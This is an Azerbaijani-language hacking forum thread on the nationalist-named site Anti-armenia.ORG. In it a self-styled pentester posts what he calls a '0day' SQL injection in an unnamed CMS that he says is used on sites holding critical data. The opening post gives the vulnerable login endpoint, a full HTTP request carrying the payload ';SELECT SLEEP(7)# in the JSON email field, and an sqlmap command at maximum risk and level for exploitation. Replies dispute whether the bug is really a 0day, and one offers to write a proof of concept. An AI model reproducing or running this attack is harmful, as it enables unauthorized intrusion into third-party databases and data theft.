Anti-armenia.ORG - Forumlar - 0Day by CyberRuf



Istifadəçi
    2023-06-04 20:04 GMT                 

cyberruf



Gold
Mesaj Sayı : 9
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Pentester
Yaş :
Mesaj :

Mövzunu Paylaş!


Bu CMS təxmini 10+(kritik informasiyalar daşıyan) saytlarda istifadə edilir.
qeyd:
CMS-in hansı saytlarda və hansı ölkədə istifadə edildiyini özüm qeyd etməmişəm.

// 0DAY = SQL Injection
// Müəllif = CyberRuf
// Parameter = JSON(email)
// Növ = boolean-based blind, error-based, stacked queries, time-based blind
// Tarix = {04/17/2023}

^Təsvir^
----------------------------------
<İstifadə edilmiş Alətlər >
Burp Suite, Sqlmap


<Detekt olunması>
1) Saytın giriş hissəsinə gəlirik (/en/login)
2) Daxil olduqda sorğunu tuturuq(burp ilə intercept edirik) və bu sorğuda e-poçt parametrinə ` ';SELECT SLEEP(7)# ` yazırıq
3) Şəkildən də göründüyü kimi cavab 7 saniyədən sonra gəldi – deməli bizim SQL kodumuz (payloadımız) işlədi.


POST /en/login HTTP/2
Host: site.com
Cookie: #cookie
Content-Length: 178
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Accept: application/json
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0
Sec-Ch-Ua-Platform: "linux"
Origin: https://site.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://site.com/en/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"req_type":"post","action":"login_form","artschema_form_type":"login_form","form_key":"subscription_form_5d00a7131cc5b","email":"';SELECT SLEEP(7)#","password":"tasdasdqwe123@"}

https://i.imgur.com/WODd7JD.png



<İstismar>

Biz bu sorğunu txt faylına yaza və sqlmap ilə işimizi daha da asanlaşdıra bilərik.

Sqlmap -r test.txt –random-agent –batch –risk=3 –level=5

Anti-armenia.ORG
    

Istifadəçi
    2023-06-04 23:10 GMT                 

HaCkEr_33



Banned
Mesaj Sayı : 564
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 22
Mesaj :

Mövzunu Paylaş!


Salam qardas. Ilk oncelikle elive ve biliyine sagliq.
Ama sene bildirimki bu 0day tapintisi deyil. Normal Post Sql Injection metodudur.
0day meselesini biraz arasdirmagini tovsuye edirem .... Ugurlar

Anti-armenia.ORG
    

Istifadəçi
    2023-06-05 05:44 GMT                 

cyberruf



Gold
Mesaj Sayı : 9
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Pentester
Yaş :
Mesaj :

Mövzunu Paylaş!


Salam dostum çox sağol fikirlərin üçün, postun əvvəlində qeyd etmişəm axı bu CMS(content management system) 10+ (kritik informasiyalar daşıyan) saytlarda istifadə edilir yəni bu boşluq 1 saytda yoxdu
Məndə sənə tövsiyyə edirəm ki, zero day anlayışını araşdırasan.

Anti-armenia.ORG
    

Istifadəçi
    2023-06-05 07:46 GMT                 

HaCkEr_33



Banned
Mesaj Sayı : 564
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 22
Mesaj :

Mövzunu Paylaş!


Sitat
#62053 cyberruf :
Salam dostum çox sağol fikirlərin üçün, postun əvvəlində qeyd etmişəm axı bu CMS(content management system) 10+ (kritik informasiyalar daşıyan) saytlarda istifadə edilir yəni bu boşluq 1 saytda yoxdu
Məndə sənə tövsiyyə edirəm ki, zero day anlayışını araşdırasan.


Dostum mən 9 ildir bu sahədəyəm. Düşünə bilməyəcəyin yerlərdə cms sistemlərində 0day tapmışam. Mən onun anlayışını biləndə sən bəlkədə bu işlərin içində deyildin.
1 dən çox sayt üzərində olması yenədə 0day olduğunu demir. Bu üsulu hər adam qabağına çıxan bir saytda onsuzda post sql injection kimi istifadə edir.
Bir ara Wordpress File Managerin exploiti çıxmışdı. Nəqədər sayt o Fm islədirdisə hamısına vuruldu saytların.
Ama bu göstərdiyin üsul bütün cms sistemlərində keçərli deyil.
Qirilmasi en asan hashi qira bilmediyn movzu var. Guldurme meni. Arasdirmali olan sensen men yox. Neise
Yəgin anlayarsan nə demək istədiyimi.
Uğurlar sənə.!

Anti-armenia.ORG
    

Istifadəçi
    2023-06-05 16:31 GMT                 

thealekberli



İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Cyber Attacker
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#62054 HaCkEr_33 :
Sitat
#62053 cyberruf :
Salam dostum çox sağol fikirlərin üçün, postun əvvəlində qeyd etmişəm axı bu CMS(content management system) 10+ (kritik informasiyalar daşıyan) saytlarda istifadə edilir yəni bu boşluq 1 saytda yoxdu
Məndə sənə tövsiyyə edirəm ki, zero day anlayışını araşdırasan.


Dostum mən 9 ildir bu sahədəyəm. Düşünə bilməyəcəyin yerlərdə cms sistemlərində 0day tapmışam. Mən onun anlayışını biləndə sən bəlkədə bu işlərin içində deyildin.
1 dən çox sayt üzərində olması yenədə 0day olduğunu demir. Bu üsulu hər adam qabağına çıxan bir saytda onsuzda post sql injection kimi istifadə edir.
Bir ara Wordpress File Managerin exploiti çıxmışdı. Nəqədər sayt o Fm islədirdisə hamısına vuruldu saytların.
Ama bu göstərdiyin üsul bütün cms sistemlərində keçərli deyil.
Yəgin anlayarsan nə demək istədiyimi.
Uğurlar sənə.!



Cənab administrator, məncə rəy bildirərkən eqo'lu mesajlara yol verməsək yaxşı olar. Sən 9 ildir bu işin içində ola bilərsən, təbii ki sənin neçə il bu sahə ilə məşğul olman burda kiməsə maraqlı deyil (kəmiyyət yox keyfiyyət önəmlidir). Qarşıdakı insana bu formada münasibət bildirmək AAT administratoruna yaraşmaz.

Anti-armenia.ORG
    

Istifadəçi
    2023-06-06 05:40 GMT                 

HaCkEr_33



Banned
Mesaj Sayı : 564
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 22
Mesaj :

Mövzunu Paylaş!


Sitat
#62056 thealekberli :
Sitat
#62054 HaCkEr_33 :
Sitat
#62053 cyberruf :
Salam dostum çox sağol fikirlərin üçün, postun əvvəlində qeyd etmişəm axı bu CMS(content management system) 10+ (kritik informasiyalar daşıyan) saytlarda istifadə edilir yəni bu boşluq 1 saytda yoxdu
Məndə sənə tövsiyyə edirəm ki, zero day anlayışını araşdırasan.


Dostum mən 9 ildir bu sahədəyəm. Düşünə bilməyəcəyin yerlərdə cms sistemlərində 0day tapmışam. Mən onun anlayışını biləndə sən bəlkədə bu işlərin içində deyildin.
1 dən çox sayt üzərində olması yenədə 0day olduğunu demir. Bu üsulu hər adam qabağına çıxan bir saytda onsuzda post sql injection kimi istifadə edir.
Bir ara Wordpress File Managerin exploiti çıxmışdı. Nəqədər sayt o Fm islədirdisə hamısına vuruldu saytların.
Ama bu göstərdiyin üsul bütün cms sistemlərində keçərli deyil.
Yəgin anlayarsan nə demək istədiyimi.
Uğurlar sənə.!



Cənab administrator, məncə rəy bildirərkən eqo'lu mesajlara yol verməsək yaxşı olar. Sən 9 ildir bu işin içində ola bilərsən, təbii ki sənin neçə il bu sahə ilə məşğul olman burda kiməsə maraqlı deyil (kəmiyyət yox keyfiyyət önəmlidir). Qarşıdakı insana bu formada münasibət bildirmək AAT administratoruna yaraşmaz.


Men eqolu cavab vermirem. Her Bir AAT uzvu ister user olsun ister Administrator Menim ucun basimin ustunde yeri var.
keyfiyyete qaldiqda ise keyfiyyet kimde necedir bilinir. Men burda sozun duzunu olanini yaziram qayidib eksini mene cevirirse nece cavab vermeli oldugumu yeginki anlayarsiz.
Qarsimdaki insana qarsi hormetsizlik etmirem etmeremde.
Ugurlar!

Anti-armenia.ORG
    

Istifadəçi
    2023-06-08 16:14 GMT                 

Cyber8



İstifadəçi
Mesaj Sayı : 2
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əlivə sağlıq ama cms də istəsən yaz PoC düzəldib ataram sənə exploit-db də paylaşardın

Anti-armenia.ORG